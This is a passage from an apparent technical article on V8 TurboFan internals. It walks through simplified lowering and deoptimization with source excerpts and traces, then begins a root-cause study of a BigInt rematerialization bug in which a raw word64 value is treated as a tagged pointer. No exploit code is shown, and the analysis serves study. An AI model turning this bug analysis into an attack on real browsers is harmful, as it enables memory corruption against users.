 -> 0x193680a1f83c @   38 : a9                Return 
      [ accumulator -> 43 ]

Simplified lowering

Simplified lowering is actually divided into three main phases :

  1. The truncation propagation phase (RunTruncationPropagationPhase)
    • backward propagation of truncations
  2. The type propagation phase (RunTypePropagationPhase)
    • forward propagation of types from type feedback
  3. The lowering phase (Run, after calling the previous phases)
    • may lower nodes
    • may insert conversion nodes

To get a better understanding, we'll study the evolution of the sea of nodes graph for the function below :

function f(a) {
  if (a) {
    var x = 2;
  }
  else {
    var x = 5;
  }
  return 0x42 % x;
}
%PrepareFunctionForOptimization(f);
f(true);
f(false);
%OptimizeFunctionOnNextCall(f);
f(true);

Propagating truncations

To understand how truncations get propagated, we want to trace the simplified lowering using --trace-representation and look at the sea of nodes in Turbolizer right before the simplified lowering phase, which is by selecting the escape analysis phase in the menu.

The first phase starts from the End node. It visits the node and then enqueues its inputs. It doesn't truncate any of its inputs. The output is tagged.

 visit #31: End (trunc: no-value-use)
  initial #30: no-value-use
  void VisitNode(Node* node, Truncation truncation,
                 SimplifiedLowering* lowering) {
  // ...
      case IrOpcode::kEnd:
       // ...
      case IrOpcode::kJSParseInt:
        VisitInputs(node);
        // Assume the output is tagged.
        return SetOutput(node, MachineRepresentation::kTagged);

Then, for every node in the queue, the corresponding visitor is called. In that case, only a Return node is in the queue.

The visitor indicates use informations. The first input is truncated to a word32. The other inputs are not truncated. The output is tagged.

  void VisitNode(Node* node, Truncation truncation,
                 SimplifiedLowering* lowering) {
    // ...
    switch (node->opcode()) {
      // ...
      case IrOpcode::kReturn:
        VisitReturn(node);
        // Assume the output is tagged.
        return SetOutput(node, MachineRepresentation::kTagged);
      // ...
    }
  }

  void VisitReturn(Node* node) {
    int tagged_limit = node->op()->ValueInputCount() +
                       OperatorProperties::GetContextInputCount(node->op()) +
                       OperatorProperties::GetFrameStateInputCount(node->op());
    // Visit integer slot count to pop
    ProcessInput(node, 0, UseInfo::TruncatingWord32());

    // Visit value, context and frame state inputs as tagged.
    for (int i = 1; i < tagged_limit; i++) {
      ProcessInput(node, i, UseInfo::AnyTagged());
    }
    // Only enqueue other inputs (effects, control).
    for (int i = tagged_limit; i < node->InputCount(); i++) {
      EnqueueInput(node, i);
    }
  }

In the trace, we indeed observe that the End node didn't propagate any truncation to the Return node. However, the Return node does truncate its first input.

 visit #30: Return (trunc: no-value-use)
  initial #29: truncate-to-word32
  initial #28: no-truncation (but distinguish zeros)
   queue #28?: no-truncation (but distinguish zeros)
  initial #21: no-value-use

All the inputs (29, 28 21) are set in the queue and now have to be visited.

We can see that the truncation to word32 has been propagated to the node 29.

 visit #29: NumberConstant (trunc: truncate-to-word32)

When visiting the node 28, the visitor for SpeculativeNumberModulus, in that case, decides that the first two inputs should get truncated to word32.

 visit #28: SpeculativeNumberModulus (trunc: no-truncation (but distinguish zeros))
  initial #24: truncate-to-word32
  initial #23: truncate-to-word32
  initial #13: no-value-use
   queue #21?: no-value-use

Indeed, if we look at the code of the visitor, if both inputs are typed as Type::Unsigned32OrMinusZeroOrNaN(), which is the case since they are typed as Range(66,66) and Range(2,5) , and the node truncation is a word32 truncation (not the case here since there is no truncation) or the node is typed as Type::Unsigned32() (true because the node is typed as Range(0,4)) then, a call to VisitWord32TruncatingBinop is made.

This visitor indicates a truncation to word32 on the first two inputs and sets the output representation to Any. It also add all the inputs to the queue.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
                                     SimplifiedLowering* lowering) {
    if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
        (truncation.IsUsedAsWord32() ||
         NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
      // => unsigned Uint32Mod
      VisitWord32TruncatingBinop(node);
      if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
      return;
    }
    // ...
  }

  void VisitWord32TruncatingBinop(Node* node) {
    VisitBinop(node, UseInfo::TruncatingWord32(),
               MachineRepresentation::kWord32);
  }

  // Helper for binops of the I x I -> O variety.
  void VisitBinop(Node* node, UseInfo input_use, MachineRepresentation output,
                  Type restriction_type = Type::Any()) {
    VisitBinop(node, input_use, input_use, output, restriction_type);
  }

  // Helper for binops of the R x L -> O variety.
  void VisitBinop(Node* node, UseInfo left_use, UseInfo right_use,
                  MachineRepresentation output,
                  Type restriction_type = Type::Any()) {
    DCHECK_EQ(2, node->op()->ValueInputCount());
    ProcessInput(node, 0, left_use);
    ProcessInput(node, 1, right_use);
    for (int i = 2; i < node->InputCount(); i++) {
      EnqueueInput(node, i);
    }
    SetOutput(node, output, restriction_type);
  }

For the next node in the queue (#21), the visitor doesn't indicate any truncation.

 visit #21: Merge (trunc: no-value-use)
  initial #19: no-value-use
  initial #17: no-value-use

It simply adds its own inputs to the queue and indicates that this Merge node has a kTagged output representation.

  void VisitNode(Node* node, Truncation truncation,
                 SimplifiedLowering* lowering) {
  // ...
      case IrOpcode::kMerge:
      // ...
      case IrOpcode::kJSParseInt:
        VisitInputs(node);
        // Assume the output is tagged.
        return SetOutput(node, MachineRepresentation::kTagged);

The SpeculativeNumberModulus node indeed propagated a truncation to word32 to its inputs 24 (NumberConstant) and 23 (Phi).

 visit #24: NumberConstant (trunc: truncate-to-word32)
 visit #23: Phi (trunc: truncate-to-word32)
  initial #20: truncate-to-word32
  initial #22: truncate-to-word32
   queue #21?: no-value-use
 visit #13: JSStackCheck (trunc: no-value-use)
  initial #12: no-truncation (but distinguish zeros)
  initial #14: no-truncation (but distinguish zeros)
  initial #6: no-value-use
  initial #0: no-value-use

Now let's have a look at the phi visitor. It simply forwards the propagations to its inputs and adds them to the queue. The output representation is inferred from the phi node's type.

  // Helper for handling phis.
  void VisitPhi(Node* node, Truncation truncation,
                SimplifiedLowering* lowering) {
    MachineRepresentation output =
        GetOutputInfoForPhi(node, TypeOf(node), truncation);
    // Only set the output representation if not running with type
    // feedback. (Feedback typing will set the representation.)
    SetOutput(node, output);

    int values = node->op()->ValueInputCount();
    if (lower()) {
      // Update the phi operator.
      if (output != PhiRepresentationOf(node->op())) {
        NodeProperties::ChangeOp(node, lowering->common()->Phi(output, values));
      }
    }

    // Convert inputs to the output representation of this phi, pass the
    // truncation along.
    UseInfo input_use(output, truncation);
    for (int i = 0; i < node->InputCount(); i++) {
      ProcessInput(node, i, i < values ? input_use : UseInfo::None());
    }
  }

Finally, the phi node's inputs get visited.

 visit #20: NumberConstant (trunc: truncate-to-word32)
 visit #22: NumberConstant (trunc: truncate-to-word32)

They don't have any inputs to enqueue. Output representation is set to tagged signed.

      case IrOpcode::kNumberConstant: {
        double const value = OpParameter<double>(node->op());
        int value_as_int;
        if (DoubleToSmiInteger(value, &value_as_int)) {
          VisitLeaf(node, MachineRepresentation::kTaggedSigned);
          if (lower()) {
            intptr_t smi = bit_cast<intptr_t>(Smi::FromInt(value_as_int));
            DeferReplacement(node, lowering->jsgraph()->IntPtrConstant(smi));
          }
          return;
        }
        VisitLeaf(node, MachineRepresentation::kTagged);
        return;
      }

We've unrolled enough of the algorithm by hand to understand the first truncation propagation phase. Let's have a look at the type propagation phase.

Please note that a visitor may behave differently according to the phase that is currently being executing.

  bool lower() const { return phase_ == LOWER; }
  bool retype() const { return phase_ == RETYPE; }
  bool propagate() const { return phase_ == PROPAGATE; }

That's why the NumberConstant visitor does not trigger a DeferReplacement during the truncation propagation phase.

Retyping

There isn't so much to say about the retyping phase. Starting from the End node, every node of the graph is put in a stack. Then, starting from the top of the stack, types are updated with UpdateFeedbackType and revisited. This allows to forward propagate updated type information (starting from the Start, not the End).

As we can observe by tracing the phase, that's when final output representations are computed and displayed :

 visit #29: NumberConstant
  ==> output kRepTaggedSigned

For nodes 23 (phi) and 28 (SpeculativeNumberModulus), there is also an updated feedback type.

#23:Phi[kRepTagged](#20:NumberConstant, #22:NumberConstant, #21:Merge)  [Static type: Range(2, 5)]
 visit #23: Phi
  ==> output kRepWord32
#28:SpeculativeNumberModulus[SignedSmall](#24:NumberConstant, #23:Phi, #13:JSStackCheck, #21:Merge)  [Static type: Range(0, 4)]
 visit #28: SpeculativeNumberModulus
  ==> output kRepWord32

Lowering and inserting conversions

Now that every node has been associated with use informations for every input as well as an output representation, the last phase consists in :

  • lowering the node itself to a more specific one (via a DeferReplacement for instance)
  • converting nodes when the output representation of an input doesn't match with the expected use information for this input (could be done with ConvertInput)

Note that a node won't necessarily change. There may not be any lowering and/or any conversion.

Let's get through the evolution of a few nodes. The NumberConstant #29 will be replaced by the Int32Constant #41. Indeed, the output of the NumberConstant @29 has a kRepTaggedSigned representation. However, because it is used as its first input, the Return node wants it to be truncated to word32. Therefore, the node will get converted. This is done by the ConvertInput function. It will itself call the representation changer via the function GetRepresentationFor. Because the truncation to word32 is requested, execution is redirected to RepresentationChanger::GetWord32RepresentationFor which then calls MakeTruncatedInt32Constant.

Node* RepresentationChanger::MakeTruncatedInt32Constant(double value) {
  return jsgraph()->Int32Constant(DoubleToInt32(value));
}

visit #30: Return
  change: #30:Return(@0 #29:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32

For the second input of the Return node, the use information indicates a tagged representation and no truncation. However, the second input (SpeculativeNumberModulus #28) has a kRepWord32 output representation. Again, it doesn't match and when calling ConvertInput the representation changer will be used. This time, the function used is RepresentationChanger::GetTaggedRepresentationFor. If the type of the input (node #28) is a Signed31, then TurboFan knows it can use a ChangeInt31ToTaggedSigned operator to make the conversion. This is the case here because the type computed for node 28 is Range(0,4).

// ...
    else if (IsWord(output_rep)) {
    if (output_type.Is(Type::Signed31())) {
      op = simplified()->ChangeInt31ToTaggedSigned();
    }

visit #30: Return
  change: #30:Return(@1 #28:SpeculativeNumberModulus)  from kRepWord32 to kRepTagged:no-truncation (but distinguish zeros)

The last example we'll go through is the case of the SpeculativeNumberModulus node itself.

 visit #28: SpeculativeNumberModulus
  change: #28:SpeculativeNumberModulus(@0 #24:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32
// (comment) from #24:NumberConstant to #44:Int32Constant
defer replacement #28:SpeculativeNumberModulus with #60:Phi

If we compare the graph (well, a subset), we can observe :

  • the insertion of the ChangeInt31ToTaggedSigned (#42), in the blue rectangle
  • the original inputs of node #28, before simplified lowering, are still there but attached to other nodes (orange rectangle)
  • node #28 has been replaced by the phi node #60 ... but it also leads to the creation of all the other nodes in the orange rectangle

This is before simplified lowering :

This is after :

The creation of all the nodes inside the green rectangle is done by SimplifiedLowering::Uint32Mod which is called by the SpeculativeNumberModulus visitor.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
                                     SimplifiedLowering* lowering) {
    if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
        (truncation.IsUsedAsWord32() ||
         NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
      // => unsigned Uint32Mod
      VisitWord32TruncatingBinop(node);
      if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
      return;
    }
Node* SimplifiedLowering::Uint32Mod(Node* const node) {
  Uint32BinopMatcher m(node);
  Node* const minus_one = jsgraph()->Int32Constant(-1);
  Node* const zero = jsgraph()->Uint32Constant(0);
  Node* const lhs = m.left().node();
  Node* const rhs = m.right().node();

  if (m.right().Is(0)) {
    return zero;
  } else if (m.right().HasValue()) {
    return graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, graph()->start());
  }

  // General case for unsigned integer modulus, with optimization for (unknown)
  // power of 2 right hand side.
  //
  //   if rhs == 0 then
  //     zero
  //   else
  //     msk = rhs - 1
  //     if rhs & msk != 0 then
  //       lhs % rhs
  //     else
  //       lhs & msk
  //
  // Note: We do not use the Diamond helper class here, because it really hurts
  // readability with nested diamonds.
  const Operator* const merge_op = common()->Merge(2);
  const Operator* const phi_op =
      common()->Phi(MachineRepresentation::kWord32, 2);

  Node* check0 = graph()->NewNode(machine()->Word32Equal(), rhs, zero);
  Node* branch0 = graph()->NewNode(common()->Branch(BranchHint::kFalse), check0,
                                   graph()->start());

  Node* if_true0 = graph()->NewNode(common()->IfTrue(), branch0);
  Node* true0 = zero;

  Node* if_false0 = graph()->NewNode(common()->IfFalse(), branch0);
  Node* false0;
  {
    Node* msk = graph()->NewNode(machine()->Int32Add(), rhs, minus_one);

    Node* check1 = graph()->NewNode(machine()->Word32And(), rhs, msk);
    Node* branch1 = graph()->NewNode(common()->Branch(), check1, if_false0);

    Node* if_true1 = graph()->NewNode(common()->IfTrue(), branch1);
    Node* true1 = graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, if_true1);

    Node* if_false1 = graph()->NewNode(common()->IfFalse(), branch1);
    Node* false1 = graph()->NewNode(machine()->Word32And(), lhs, msk);

    if_false0 = graph()->NewNode(merge_op, if_true1, if_false1);
    false0 = graph()->NewNode(phi_op, true1, false1, if_false0);
  }

  Node* merge0 = graph()->NewNode(merge_op, if_true0, if_false0);
  return graph()->NewNode(phi_op, true0, false0, merge0);
}

A high level overview of deoptimization

Understanding deoptimization requires to study several components of V8 :

  • instruction selection
    • when descriptors for FrameState and StateValues nodes are built
  • code generation
    • when deoptimization input data are built (that includes a Translation)
  • the deoptimizer
    • at runtime, this is where execution is redirected to when "bailing out to deoptimization"
    • uses the Translation
    • translates from the current input frame (optimized native code) to the output interpreted frame (interpreted ignition bytecode)

When looking at the sea of nodes in Turbolizer, you may see different kind of nodes related to deoptimization such as :

  • Checkpoint
    • refers to a FrameState
  • FrameState
    • refers to a position and a state, takes StateValues as inputs
  • StateValues
    • state of parameters, local variables, accumulator
  • Deoptimize / DeoptimizeIf / DeoptimizeUnless etc

There are several types of deoptimization :

  • eager, when you deoptimize the current function on the spot
    • you just triggered a type guard (ex: wrong map, thanks to a CheckMaps node)
  • lazy, you deoptimize later
    • another function just violated a code dependency (ex: a function call just made a map unstable, violating a stable map dependency)
  • soft
    • a function got optimized too early, more feedback is needed

We are only discussing the case where optimized assembly code deoptimizes to ignition interpreted bytecode, that is the constructed output frame is called an interpreted frame. However, there are other kinds of frames we are not going to discuss in this article (ex: adaptor frames, builtin continuation frames, etc). Michael Stanton, a V8 dev, wrote a few interesting blog posts you may want to check.

We know that javascript first gets translated to ignition bytecode (and a feedback vector is associated to that bytecode). Then, TurboFan might kick in and generate optimized code based on speculations (using the aforementioned feedback vector). It associates deoptimization input data to this optimized code. When executing optimized code, if an assumption is violated (let's say, a type guard for instance), the flow of execution gets redirected to the deoptimizer. The deoptimizer takes those deoptimization input data to translate the current input frame and compute an output frame. The deoptimization input data tell the deoptimizer what kind of deoptimization is to be done (for instance, are we going back to some standard ignition bytecode? That implies building an interpreted frame as an output frame). They also indicate where to deoptimize to (such as the bytecode offset), what values to put in the output frame and how to translate them. Finally, once everything is ready, it returns to the ignition interpreter.

During code generation, for every instruction that has a flag indicating a possible deoptimization, a branch is generated. It either branches to a continuation block (normal execution) or to a deoptimization exit to which is attached a Translation.

To build the translation, code generation uses information from structures such as a FrameStateDescriptor and a list of StateValueDescriptor. They obviously correspond to FrameState and StateValues nodes. Those structures are built during instruction selection, not when visiting those nodes (no code generation is directly associated to those nodes, therefore they don't have associated visitors in the instruction selector).

Tracing a deoptimization

Let's get through a quick experiment using the following script.

function add_prop(x) {
let obj = {};
obj[x] = 42;
}

add_prop("x");
%PrepareFunctionForOptimization(add_prop);
add_prop("x");
add_prop("x");
add_prop("x");
%OptimizeFunctionOnNextCall(add_prop);
add_prop("x");
add_prop("different");

Now run it using --turbo-profiling and --print-code-verbose.

This allows to dump the deoptimization input data :

Deoptimization Input Data (deopt points = 5)
 index  bytecode-offset    pc  commands
     0                0   269  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
                               INTERPRETED_FRAME {bytecode_offset=0, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
                               STACK_SLOT {input=3}
                               STACK_SLOT {input=-2}
                               STACK_SLOT {input=-1}
                               STACK_SLOT {input=4}
                               LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}
                               LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}

// ...

     4                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
                               INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
                               STACK_SLOT {input=3}
                               STACK_SLOT {input=-2}
                               REGISTER {input=rcx}
                               STACK_SLOT {input=4}
                               CAPTURED_OBJECT {length=7}
                               LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=6 (42)}

And we also see the code used to bail out to deoptimization (notice that the deopt index matches with the index of a translation in the deoptimization input data).

// trimmed / simplified output
nop
REX.W movq r13,0x0       ;; debug: deopt position, script offset '17'
                         ;; debug: deopt position, inlining id '-1'
                         ;; debug: deopt reason '(unknown)'
                         ;; debug: deopt index 0
call 0x55807c02040       ;; lazy deoptimization bailout
// ...
REX.W movq r13,0x4       ;; debug: deopt position, script offset '44'
                         ;; debug: deopt position, inlining id '-1'
                         ;; debug: deopt reason 'wrong name'
                         ;; debug: deopt index 4
call 0x55807bc2040       ;; eager deoptimization bailout
nop

Interestingly (you'll need to also add the --code-comments flag), we can notice that the beginning of an native turbofan compiled function starts with a check for any required lazy deoptimization!

                  -- Prologue: check for deoptimization --
0x1332e5442b44    24  488b59e0       REX.W movq rbx,[rcx-0x20]
0x1332e5442b48    28  f6430f01       testb [rbx+0xf],0x1
0x1332e5442b4c    2c  740d           jz 0x1332e5442b5b  <+0x3b>
                  -- Inlined Trampoline to CompileLazyDeoptimizedCode --
0x1332e5442b4e    2e  49ba6096371501000000 REX.W movq r10,0x115379660  (CompileLazyDeoptimizedCode)    ;; off heap target
0x1332e5442b58    38  41ffe2         jmp r10

Now let's trace the actual deoptimization with --trace-deopt. We can see the deoptimization reason : wrong name. Because the feedback indicates that we always add a property named "x", TurboFan then speculates it will always be the case. Thus, executing optimized code with any different name will violate this assumption and trigger a deoptimization.

[deoptimizing (DEOPT eager): begin 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> (opt #0) @2, FP to SP delta: 24, caller sp: 0x7ffeeb82e3b0]
            ;;; deoptimize at <test.js:3:8>, wrong name

It displays the input frame.

  reading input frame add_prop => bytecode_offset=6, args=2, height=1, retval=0(#0); inputs:
      0: 0x0a6842edfa99 ;  [fp -  16]  0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)>
      1: 0x0a6876381579 ;  [fp +  24]  0x0a6876381579 <JSGlobal Object>
      2: 0x0a6842edf7a9 ; rdx 0x0a6842edf7a9 <String[#9]: different>
      3: 0x0a6842ec1831 ;  [fp -  24]  0x0a6842ec1831 <NativeContext[244]>
      4: captured object #0 (length = 7)
           0x0a68d4640439 ; (literal  3) 0x0a68d4640439 <Map(HOLEY_ELEMENTS)>
           0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
           0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
      5: 0x002a00000000 ; (literal  6) 42

The deoptimizer uses the translation at index 2 of deoptimization data.

     2                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
                               INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
                               STACK_SLOT {input=3}
                               STACK_SLOT {input=-2}
                               REGISTER {input=rdx}
                               STACK_SLOT {input=4}
                               CAPTURED_OBJECT {length=7}
                               LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=6 (42)}

And displays the translated interpreted frame.

  translating interpreted frame add_prop => bytecode_offset=6, variable_frame_size=16, frame_size=80
    0x7ffeeb82e3a8: [top +  72] <- 0x0a6876381579 <JSGlobal Object> ;  stack parameter (input #1)
    0x7ffeeb82e3a0: [top +  64] <- 0x0a6842edf7a9 <String[#9]: different> ;  stack parameter (input #2)
    -------------------------
    0x7ffeeb82e398: [top +  56] <- 0x000105d9e4d2 ;  caller's pc
    0x7ffeeb82e390: [top +  48] <- 0x7ffeeb82e3f0 ;  caller's fp
    0x7ffeeb82e388: [top +  40] <- 0x0a6842ec1831 <NativeContext[244]> ;  context (input #3)
    0x7ffeeb82e380: [top +  32] <- 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> ;  function (input #0)
    0x7ffeeb82e378: [top +  24] <- 0x0a6842edfbd1 <BytecodeArray[12]> ;  bytecode array
    0x7ffeeb82e370: [top +  16] <- 0x003b00000000 <Smi 59> ;  bytecode offset
    -------------------------
    0x7ffeeb82e368: [top +   8] <- 0x0a6893080c11 <Odd Oddball: arguments_marker> ;  stack parameter (input #4)
    0x7ffeeb82e360: [top +   0] <- 0x002a00000000 <Smi 42> ;  accumulator (input #5)

After that, it is ready to redirect the execution to the ignition interpreter.

[deoptimizing (eager): end 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> @2 => node=6, pc=0x000105d9e9a0, caller sp=0x7ffeeb82e3b0, took 2.698 ms]
Materialization [0x7ffeeb82e368] <- 0x0a6842ee0031 ;  0x0a6842ee0031 <Object map = 0xa68d4640439>

Case study : an incorrect BigInt rematerialization

Back to simplified lowering

Let's have a look at the way FrameState nodes are dealt with during the simplified lowering phase.

FrameState nodes expect 6 inputs :

  1. parameters
    • UseInfo is AnyTagged
  2. registers
    • UseInfo is AnyTagged
  3. the accumulator
    • UseInfo is Any
  4. a context
    • UseInfo is AnyTagged
  5. a closure
    • UseInfo is AnyTagged
  6. the outer frame state
    • UseInfo is AnyTagged

A FrameState has a tagged output representation.

  void VisitFrameState(Node* node) {
    DCHECK_EQ(5, node->op()->ValueInputCount());
    DCHECK_EQ(1, OperatorProperties::GetFrameStateInputCount(node->op()));

    ProcessInput(node, 0, UseInfo::AnyTagged());  // Parameters.
    ProcessInput(node, 1, UseInfo::AnyTagged());  // Registers.

    // Accumulator is a special flower - we need to remember its type in
    // a singleton typed-state-values node (as if it was a singleton
    // state-values node).
    if (propagate()) {
      EnqueueInput(node, 2, UseInfo::Any());
    } else if (lower()) {
      Zone* zone = jsgraph_->zone();
      Node* accumulator = node->InputAt(2);
      if (accumulator == jsgraph_->OptimizedOutConstant()) {
        node->ReplaceInput(2, jsgraph_->SingleDeadTypedStateValues());
      } else {
        ZoneVector<MachineType>* types =
            new (zone->New(sizeof(ZoneVector<MachineType>)))
                ZoneVector<MachineType>(1, zone);
        (*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
                                         TypeOf(accumulator));

        node->ReplaceInput(
            2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                              types, SparseInputMask::Dense()),
                                          accumulator));
      }
    }

    ProcessInput(node, 3, UseInfo::AnyTagged());  // Context.
    ProcessInput(node, 4, UseInfo::AnyTagged());  // Closure.
    ProcessInput(node, 5, UseInfo::AnyTagged());  // Outer frame state.
    return SetOutput(node, MachineRepresentation::kTagged);
  }

An input node for which the use info is AnyTagged means this input is being used as a tagged value and that the truncation kind is any i.e. no truncation is required (although it may be required to distinguish between zeros).

An input node for which the use info is Any means the input is being used as any kind of value and that the truncation kind is any. No truncation is needed. The input representation is undetermined. That is the most generic case.

// The {UseInfo} class is used to describe a use of an input of a node. 

  static UseInfo AnyTagged() {
    return UseInfo(MachineRepresentation::kTagged, Truncation::Any());
  }
  // Undetermined representation.
  static UseInfo Any() {
    return UseInfo(MachineRepresentation::kNone, Truncation::Any());
  }
  // Value not used.
  static UseInfo None() {
    return UseInfo(MachineRepresentation::kNone, Truncation::None());
  }
const char* Truncation::description() const {
  switch (kind()) {
  // ...
    case TruncationKind::kAny:
      switch (identify_zeros()) {
        case TruncationKind::kNone:
          return "no-value-use";
        // ...
        case kIdentifyZeros:
          return "no-truncation (but identify zeros)";
        case kDistinguishZeros:
          return "no-truncation (but distinguish zeros)";
      }
  }
  // ...
}

If we trace the first phase of simplified lowering (truncation propagation), we'll get the following input :

 visit #46: FrameState (trunc: no-truncation (but distinguish zeros))
   queue #7?: no-truncation (but distinguish zeros)
  initial #45: no-truncation (but distinguish zeros)
   queue #71?: no-truncation (but distinguish zeros)
   queue #4?: no-truncation (but distinguish zeros)
   queue #62?: no-truncation (but distinguish zeros)
   queue #0?: no-truncation (but distinguish zeros)

All the inputs are added to the queue, no truncation is ever propagated. The node #71 corresponds to the accumulator since it is the 3rd input.

 visit #71: BigIntAsUintN (trunc: no-truncation (but distinguish zeros))
   queue #70?: no-value-use

In our example, the accumulator input is a BigIntAsUintN node. Such a node consumes an input which is a word64 and is truncated to a word64.

The astute reader will wonder what happens if this node returns a number that requires more than 64 bits. The answer lies in the inlining phase. Indeed, a JSCall to the BigInt.AsUintN builtin will be reduced to a BigIntAsUintN turbofan operator only in the case where TurboFan is guaranted that the requested width is of 64-bit a most.

This node outputs a word64 and has BigInt as a restriction type. During the type propagation phase, any type computed for a given node will be intersected with its restriction type.

      case IrOpcode::kBigIntAsUintN: {
        ProcessInput(node, 0, UseInfo::TruncatingWord64());
        SetOutput(node, MachineRepresentation::kWord64, Type::BigInt());
        return;
      }

So at this point (after the propagation phase and before the lowering phase), if we focus on the FrameState node and its accumulator input node (3rd input), we can say the following :

  • the FrameState's 2nd input expects MachineRepresentation::kNone (includes everything, especially kWord64)
  • the FrameState doesn't truncate its 2nd input
  • the BigIntAsUintN output representation is kWord64

Because the input 2 is used as Any (with a kNone representation), there won't ever be any conversion of the input node :

  // Converts input {index} of {node} according to given UseInfo {use},
  // assuming the type of the input is {input_type}. If {input_type} is null,
  // it takes the input from the input node {TypeOf(node->InputAt(index))}.
  void ConvertInput(Node* node, int index, UseInfo use,
                    Type input_type = Type::Invalid()) {
    Node* input = node->InputAt(index);
    // In the change phase, insert a change before the use if necessary.
    if (use.representation() == MachineRepresentation::kNone)
      return;  // No input requirement on the use.

So what happens during during the last phase of simplified lowering (the phase that lowers nodes and adds conversions)? If we look at the visitor of FrameState nodes, we can see that eventually the accumulator input may get replaced by a TypedStateValues node. The BigIntAsUintN node is now the input of the TypedStateValues node. No conversion of any kind is ever done.

  ZoneVector<MachineType>* types =
      new (zone->New(sizeof(ZoneVector<MachineType>)))
          ZoneVector<MachineType>(1, zone);
  (*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
                                   TypeOf(accumulator));

  node->ReplaceInput(
      2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                        types, SparseInputMask::Dense()),
                                    accumulator));

Also, the vector of MachineType is associated to the TypedStateValues. To compute the machine type, DeoptMachineTypeOf relies on the node's type.

In that case (a BigIntAsUintN node), the type will be Type::BigInt().

Type OperationTyper::BigIntAsUintN(Type type) {
  DCHECK(type.Is(Type::BigInt()));
  return Type::BigInt();
}

As we just saw, because for this node the output representation is kWord64 and the type is BigInt, the MachineType is MachineType::AnyTagged.

  static MachineType DeoptMachineTypeOf(MachineRepresentation rep, Type type) {
    // ..
    if (rep == MachineRepresentation::kWord64) {
      if (type.Is(Type::BigInt())) {
        return MachineType::AnyTagged();
      }
// ...
  }

So if we look at the sea of node right after the escape analysis phase and before the simplified lowering phase, it looks like this :

And after the simplified lowering phase, we can confirm that a TypedStateValues node was indeed inserted.

After effect control linearization, the BigIntAsUintN node gets lowered to a Word64And node.

As we learned earlier, the FrameState and TypedStateValues nodes do not directly correspond to any code generation.

void InstructionSelector::VisitNode(Node* node) {
  switch (node->opcode()) {
  // ...
    case IrOpcode::kFrameState:
    case IrOpcode::kStateValues:
    case IrOpcode::kObjectState:
      return;
  // ...

However, other nodes may make use of FrameState and TypedStateValues nodes. This is the case for instance of the various Deoptimize nodes and also Call nodes.

They will make the instruction selector build the necessary FrameStateDescriptor and StateValueList of StateValueDescriptor.

Using those structures, the code generator will then build the necessary DeoptimizationExits to which a Translation will be associated with. The function BuildTranslation will handle the the InstructionOperands in CodeGenerator::AddTranslationForOperand. And this is where the (AnyTagged) MachineType corresponding to the BigIntAsUintN node is used! When building the translation, we are using the BigInt value as if it was a pointer (second branch) and not a double value (first branch)!

void CodeGenerator::AddTranslationForOperand(Translation* translation,
                                             Instruction* instr,
                                             InstructionOperand* op,
                                             MachineType type) {      
  case Constant::kInt64:
        DCHECK_EQ(8, kSystemPointerSize);
        if (type.representation() == MachineRepresentation::kWord64) {
          literal =
              DeoptimizationLiteral(static_cast<double>(constant.ToInt64()));
        } else {
          // When pointers are 8 bytes, we can use int64 constants to represent
          // Smis.
          DCHECK_EQ(MachineRepresentation::kTagged, type.representation());
